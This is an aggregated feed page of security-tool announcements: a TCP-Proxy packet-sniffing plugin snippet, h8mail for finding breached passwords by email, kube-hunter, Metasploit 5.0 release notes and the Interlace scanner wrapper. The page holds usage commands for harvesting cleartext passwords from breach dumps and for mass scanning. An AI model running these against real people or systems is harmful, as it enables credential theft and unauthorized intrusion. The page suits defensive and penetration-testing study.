            ExamplePlugin._instance = ExamplePlugin()
        return ExamplePlugin._instance

    def filterPackets(self,pkt): # (pkt) object in order to modify the data on the fly
        if pkt.haslayer(http.HTTPRequest): # filter only http request

            http_layer = pkt.getlayer(http.HTTPRequest) # get http fields as dict type
            ip_layer = pkt.getlayer(IP)# get ip headers fields as dict type

            print http_layer.fields['Method'] # show method http request
            # show all item in Header request http
            for item in http_layer.fields['Headers']:
                print('{} : {}'.format(item,http_layer.fields['Headers'][item]))

            print ip_layer.fields['src'] # show source ip address
            print ip_layer.fields['dst'] # show destiny ip address

            print http_layer # show item type dict
            print ip_layer # show item type dict

            return self.output.emit({'name_module':'send output to tab TCP-Proxy'})

About TCP-Proxy
TCP-Proxy on the wiki

Screenshots
Screenshot on the wiki




H8Mail - Email OSINT And Password Breach Hunting

January 11, 2019, 1:12 pm
$
0
0
Email OSINT and password finder.
Use h8mail to find passwords through different breach and reconnaissance services, or the infamous "Breach Compilation" torrent.

Features
  • Email pattern matching (reg exp), useful for all those raw HTML files
  • Small and fast Alpine Dockerfile available
  • CLI or Bulk file-reading for targeting
  • Output to CSV file
  • Reverse DNS + Open Ports
  • CloudFlare rate throttling avoidance
    • Execution flow remains synchronous and throttled according to API usage guidelines written by service providers
  • Query and group results from different breach service providers
  • Query a local copy of the "Breach Compilation"
  • Get related emails
  • Delicious colors

Demos

Out of the box


With API services


With the BreachedCompilation torrent



APIs
ServiceFunctionsStatus
HaveIBeenPwnedNumber of email breachsYes
ShodanReverse DNS, Open portsYes
Hunter.io - PublicNumber of related emailsYes
Hunter.io - Service (free tier)Cleartext related emailsYes
WeLeakInfo - PublicNumber of search-able breach resultsSoon
WeLeakInfo - ServiceCleartext passwords, hashs and saltsSoon
Snusbase - ServiceCleartext passwords, hashs and salts - FastYes

Install
If you're using Docker, make sure to add your targets.txt and your API keys in the configuration file before building

Locally
NodeJS is required to ensure CloudFlare bypassing. You can find out how to install it for your distribution here
These instructions assume you are running Python3 as default. If unsure, please check the troubleshooting section
apt-get install nodejs
git clone https://github.com/khast3x/h8mail.git
cd h8mail
pip install -r requirements.txt
python h8mail.py -h

Docker
git clone https://github.com/khast3x/h8mail.git
cd h8mail
docker build -t h8mail .
docker run -ti h8mail -h

Usage
> python h8mail.py --help
usage: h8mail.py [-h] -t TARGET_EMAILS [-c CONFIG_FILE] [-o OUTPUT_FILE]
                 [-bc BC_PATH] [-v] [-l] [-k CLI_APIKEYS]

Email information and password finding tool

optional arguments:
  -h, --help            show this help message and exit
  -t TARGET_EMAILS, --targets TARGET_EMAILS
                        Either single email, or file (one email per line).
                        REGEXP
  -c CONFIG_FILE, --config CONFIG_FILE
                        Configuration file for API keys
  -o OUTPUT_FILE, --output OUTPUT_FILE
                        File to write output
  -bc BC_PATH, --breachcomp BC_PATH
                        Path to the breachcompilation Torrent.
                        https://ghostbin.com/paste/2cbdn
  -v, --verbose         Show debug information
  -l, --local           Run local actions only
  -k CLI_APIKEYS, --apikey CLI_APIKEYS
                        Pass config options. Format is "K:V,K:V"

Usage examples

Query for a single target
python h8mail.py -t target@example.com

Query for list of targets, indicate config file for API keys, output to pwned_targets.csv
python h8mail.py -t targets.txt -c config.ini -o pwned_targets.csv

Query a list of targets against local copy of the Breach Compilation, pass API keys for Snusbase from the command line
python h8mail.py -t targets.txt -bc ../Downloads/BreachCompilation/ -k "snusbase_url:$snusbase_url,snusbase_token:$snusbase_token"

Query without making API calls against local copy of the Breach Compilation
python h8mail.py -t targets.txt -bc ../Downloads/BreachCompilation/ --local

Troubleshooting

Python version & Kali
The above instructions assume you are running python3 as default. If unsure, type:
python --version
in your terminal. It should be either Python 3.* or Python 2.*.
If you are running python2 as default :
Make sure you have python3 installed, then replace python commands with explicit python3 calls:
apt-get install nodejs
git clone https://github.com/khast3x/h8mail.git
cd h8mail
pip3 install -r requirements.txt
python3 h8mail.py -h

Notes & Links


Kube-Hunter - Hunt For Security Weaknesses In Kubernetes Clusters

January 12, 2019, 4:05 am
$
0
0

Kube-hunter hunts for security weaknesses in Kubernetes clusters. The tool was developed to increase awareness and visibility for security issues in Kubernetes environments. You should NOT run kube-hunter on a Kubernetes cluster you don't own!
Run kube-hunter: kube-hunter is available as a container (aquasec/kube-hunter), and we also offer a web site at kube-hunter.aquasec.com where you can register online to receive a token allowing you see and share the results online. You can also run the Python code yourself as described below.
Contribute: We welcome contributions, especially new hunter modules that perform additional tests. If you would like to develop your own modules please read Guidelines For Developing Your First kube-hunter Module.

Hunting

Where should I run kube-hunter?
Run kube-hunter on any machine (including your laptop), select Remote scanning and give the IP address or domain name of your Kubernetes cluster. This will give you an attackers-eye-view of your Kubernetes setup.
You can run kube-hunter directly on a machine in the cluster, and select the option to probe all the local network interfaces.
You can also run kube-hunter in a pod within the cluster. This gives an indication of how exposed your cluster would be in the event that one of your application pods is compromised (through a software vulnerability, for example).

Scanning options
By default, kube-hunter will open an interactive session, in which you will be able to select one of the following scan options. You can also specify the scan option manually from the command line. These are your options:
  1. Remote scanning To specify remote machines for hunting, select option 1 or use the --remote option. Example: ./kube-hunter.py --remote some.node.com
  2. Internal scanning To specify internal scanning, you can use the --internal option. (this will scan all of the machine's network interfaces) Example: ./kube-hunter.py --internal
  3. Network scanning To specify a specific CIDR to scan, use the --cidr option. Example: ./kube-hunter.py --cidr 192.168.0.0/24

Active Hunting
Active hunting is an option in which kube-hunter will exploit vulnerabilities it finds, in order to explore for further vulnerabilities. The main difference between normal and active hunting is that a normal hunt will never change state of the cluster, while active hunting can potentially do state-changing operations on the cluster, which could be harmful.
By default, kube-hunter does not do active hunting. To active hunt a cluster, use the --active flag. Example: ./kube-hunter.py --remote some.domain.com --active

List of tests
You can see the list of tests with the --list option: Example: ./kube-hunter.py --list
To see active hunting tests as well as passive: ./kube-hunter.py --list --active

Output
To control logging, you can specify a log level, using the --log option. Example: ./kube-hunter.py --active --log WARNING Available log levels are:
  • DEBUG
  • INFO (default)
  • WARNING
To see only a mapping of your nodes network, run with --mapping option. Example: ./kube-hunter.py --cidr 192.168.0.0/24 --mapping This will output all the Kubernetes nodes kube-hunter has found.

Deployment
There are three methods for deploying kube-hunter:

On Machine
You can run the kube-hunter python code directly on your machine.

Prerequisites
You will need the following installed:
  • python 2.7
  • pip
Clone the repository:
git clone git@github.com:aquasecurity/kube-hunter.git
Install module dependencies:
cd ./kube-hunter
pip install -r requirements.txt

In the case where you have python 3.x in the path as your default, and python2 refers to a python 2.7 executable, use "python2 -m pip install -r requirements.txt"
Run: ./kube-hunter.py

Container
Aqua Security maintains a containerised version of kube-hunter at aquasec/kube-hunter. This container includes this source code, plus an additional (closed source) reporting plugin for uploading results into a report that can be viewed at kube-hunter.aquasec.com. Please note that running the aquasec/kube-hunter container and uploading reports data are subject to additional terms and conditions.
The Dockerfile in this repository allows you to build a containerised version without the reporting plugin.
If you run the kube-hunter container with the host network it will be able to probe all the interfaces on the host:
docker run -it --rm --network host aquasec/kube-hunter
Note for Docker for Mac/Windows: Be aware that the "host" for Docker for Mac or Windows is the VM which Docker runs containers within. Therefore specifying --network host allows kube-hunter access to the network interfaces of that VM, rather than those of your machine. By default kube-hunter runs in interactive mode. You can also specify the scanning option with the parameters described above e.g.
docker run --rm aquasec/kube-hunter --cidr 192.168.0.0/24

Pod
This option lets you discover what running a malicious container can do/discover on your cluster. This gives a perspective on what an attacker could do if they were able to compromise a pod, perhaps through a software vulnerability. This may reveal significantly more vulnerabilities.
The job.yaml file defines a Job that will run kube-hunter in a pod, using default Kubernetes pod access settings.
  • Run the job with kubectl create with that yaml file.
  • Find the pod name with kubectl describe job kube-hunter
  • View the test results with kubectl logs <pod name>


Metasploit 5.0 - The World’s Most Used Penetration Testing Framework

January 12, 2019, 12:46 pm
$
0
0

Knowledge is power, especially when it’s shared. A collaboration between the open source community and Rapid7, Metasploit helps security teams do more than just verify vulnerabilities, manage security assessments, and improve security awareness; it empowers and arms defenders to always stay one step (or two) ahead of the game.

Rapid7 announced the release of Metasploit 5.0, the new version includes several new important features and, the company believes it will easier to use and more powerful.

Metasploit is the most widely used penetration testing framework and it has more than 1500+ modules that deliver functionalities covering every phase of a penetration test, making the life of a penetration tester comparatively easier.

 Most important changes introduced in the Metasploit 5.0 include new database and automation APIs, evasion modules and libraries, language support, improved performance.

Metasploit 5.0 is currently available from its official GitHub project. Rapid7 says it’s in the process of informing third-party developers that Metasploit 5.0 is stable – Linux distributions such as Kali and ParrotSec are shipped with Metasploit.

Metasploit 5.0 Release Notes

Metasploit 5.0 brings many new features, including new database and automation APIs, evasion modules and libraries, language support, improved performance, and ease-of-use.

The following is a high-level overview of Metasploit 5.0’s features and capabilities.

  • Metasploit users can now run the PostgreSQL database by itself as a RESTful service, which allows for multiple Metasploit consoles and external tools to interact with it.
  • Parallel processing of the database and regular msfconsole operations improves performance by offloading some bulk operations to the database service.
  • A JSON-RPC API enables users to integrate Metasploit with additional tools and languages.
  • This release adds a common web service framework to expose both the database and the automation APIs; this framework supports advanced authentication and concurrent operations. Read more about how to set up and run these new services here.
  • Adds evasion module type and libraries to let users generate evasive payloads without having to install external tools. Read the research underpinning evasion modules here. Rapid7’s first evasion modules are here.
  • The metashell feature allows users to run background sessions and interact with shell sessions without needing to upgrade to a Meterpreter session.
  • External modules add Metasploit support for Python and Go in addition to Ruby.
  • Any module can target multiple hosts by setting RHOSTS to a range of IPs, or by referencing a hosts file with the file:// option. Metasploit now treats RHOST and RHOSTS as identical options.
  • An updated search mechanism improves Framework start time and removes database dependency.


Interlace - Easily Turn Single Threaded Command Line Applications Into Fast, Multi Threaded Ones With CIDR And Glob Support

January 13, 2019, 4:10 am
$
0
0

Easily turn single threaded command line applications into fast, multi threaded application with CIDR and glob support.

Setup
Install using:
$ python3 setup.py install
Dependencies will then be installed and Interlace will be added to your path as interlace.

Usage
ArgumentDescription
-tSpecify a target or domain name either in comma format, CIDR notation, or as an individual host.
-tLSpecify a list of targets or domain names
-threadsSpecify the maximum number of threads to run at any one time (DEFAULT:5)
-timeoutSpecify a timeout value in seconds for any one thread (DEFAULT:600)
-cSpecify a single command to execute over each target or domain
-cLSpecify a list of commands to execute over each target or domain
-oSpecify an output folder variable that can be used in commands as _output_
-pSpecify a list of port variable that can be used in commands as _port_. This can be a single port, a comma delimited list, or use dash notation
-rpSpecify a real port variable that can be used in commands as _realport_
--no-cidrIf set then CIDR notation in a target file will not be automatically be expanded into individual hosts.
--no-colorIf set then any foreground or background colours will be stripped out
--silentIf set then only important information will be displayed and banners and other information will be redacted.
-vIf set then verbose output will be displayed in the terminal

Further information regarding ports (-p)
ExampleNotation Type
80Single port
1-80Dash notation, perform a command for each port from 1-80
80,443Perform a command for both port 80, and port 443

Further information regarding targets (-t or -tL)
Both -t and -tL will be processed the same. You can pass targets the same as you would when using nmap. This can be done using CIDR notation, dash notation, or a comma delimited list of targets. A single target list file can also use different notation types per line.

Variable Replacements
The following varaibles will be replaced in commands at runtime:
VariableReplacement
_target_Replaced with the expanded target list that the current thread is running against
_host_Works the same as _target_, can be used interchangably.
_output_Replaced with the output folder variable from interlace
_port_Replaced with the expanded port variable from interlace
_realport_Replaced with the real port variable from interlace

Usage Examples

Run Nikto Over Multiple Sites
Let's assume that you had a file targets.txt that had the following contents:
bugcrowd.com
hackerone.com
You could use interlace to run over any number of targets within this file using: bash
➜  /tmp interlace -tL ./targets.txt -threads 5 -c "nikto --host _target_ > ./_target_-nikto.txt" -v
==============================================
Interlace v1.0 by Michael Skelton (@codingo_)
==============================================
[14:33:23] [THREAD] [nikto --host hackerone.com > ./hackerone.com-nikto.txt] Added to Queue 
[14:33:23] [THREAD] [nikto --host bugcrowd.com > ./bugcrowd.com-nikto.txt] Added to Queue
This would run nikto over each host and save to a file for each target. Note that in the above example since we're using the > operator so results won't be fed back to the terminal, however this is desired functionality as otherwise we wouldn't be able to attribute which target Nikto results were returning for.
For applications where you desire feedback simply pass commands as you normally would (or use tee).

Run Nikto Over Multiple Sites and Ports
Using the above example, let's assume you want independant scans to be run for both ports 80 and 443 for the same targets. You would then use the following:
➜  /tmp interlace -tL ./targets.txt -threads 5 -c "nikto --host _target_:_port_ > ./_target_-_port_-nikto.txt" -p 80,443 -v
==============================================
Interlace v1.0 by Michael Skelton (@codingo_)
==============================================
[14:33:23] [THREAD] [nikto --host hackerone.com:80 > ./hackerone.com-nikto.txt] Added to Queue 
[14:33:23] [THREAD] [nikto --host bugcrowd.com:80 > ./hackerone.com-nikto.txt] Added to Queue 
[14:33:23] [THREAD] [nikto --host bugcrowd.com:443 > ./bugcrowd.com-nikto.txt] Added to Queue 
[14:33:23] [THREAD] [nikto --host hackerone.com:443 > ./hackerone.com-nikto.txt] Added to Queue

Run a List of Commands against Target Hosts
Often with penetration tests there's a list of commands you want to run on nearly every job. Assuming that list includes testssl.sh, nikto, and sslscan, you could save a command list with the following in a file called commands.txt:
nikto --host _target_:_port_ > _output_/_target_-nikto.txt
sslscan _target_:_port_ >  _output_/_target_-sslscan.txt
testssl.sh _target_:_port_ > _output_/_target_-testssl.txt
If you were then given a target, example.com you could run each of these commands against this target using the following:
interlace -t example.com -o ~/Engagements/example/ -cL ./commands.txt -p 80,443
This would then run nikto, sslscan, and testssl.sh for both port 80 and 443 against example.com and save files into your engagements folder.

CIDR notation with an application that doesn't support it
Interlace automatically expands CIDR notation when starting threads (unless the --no-cidr flag is passed). This allows you to pass CIDR notation to a variety of applications:
To run a virtual host scan against every target within 192.168.12.0/24 using a direct command you could use:
interlace -t 192.168.12.0/24 -c "vhostscan _target_ -oN _output_/_target_-vhosts.txt" -o ~/scans/ -threads 50
This is despite VHostScan not having any inbuilt CIDR notation support. Since Interlace expands the notation before building a queue of threads, VHostScan for all intents is only receiving a list of direct IP addresses to scan.

Glob notation with an application that doesn't support it
Interlace automatically expands glob ranges when starting threads. This allows you to pass glob ranges to a variety of applications:
To run a virtual host scan against every target within 192.168.12.* using a direct command you could use:
interlace -t 192.168.12.* -c "vhostscan _target_ -oN _output_/_target_-vhosts.txt" -o ~/scans/ -threads 50
Yet again, VHostScan does not having any inbuilt glob range format support.

Threading Support for an application that doesn't support it
Run a virtual host scan against each host in a file (target-lst.txt), whilst also limiting scans at any one time to 50 maximum threads.
This could be done using a direct command:
interlace -tL ./target-list.txt -c "vhostscan -t _target_ -oN _output_/_target_-vhosts.txt" -o ~/scans/ -threads 50
Or, alternatively, to run the same command as above, but using a command file, this would be done using:
interlace -cL ./vhosts-commands.txt -tL ./target-list.txt -threads 50 -o ~/scans
This presumes that the contents of the command file is:
vhostscan -t $target -oN _output_/_target_-vhosts.txt
This would output a file for each target in the specified output folder. You could also run multiple commands simply by adding them into the command file.

Auhors and Thanks
Originally written by Michael Skelton (codingo) and Sajeeb Lohani (sml555) with help from Charelle Collett (@Charcol0x89) for threading refactoring and overall appraoch, and Luke Stephens (hakluke) for testing and approach.


Viewing all 5839 articles
Browse latest View live
Search
<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>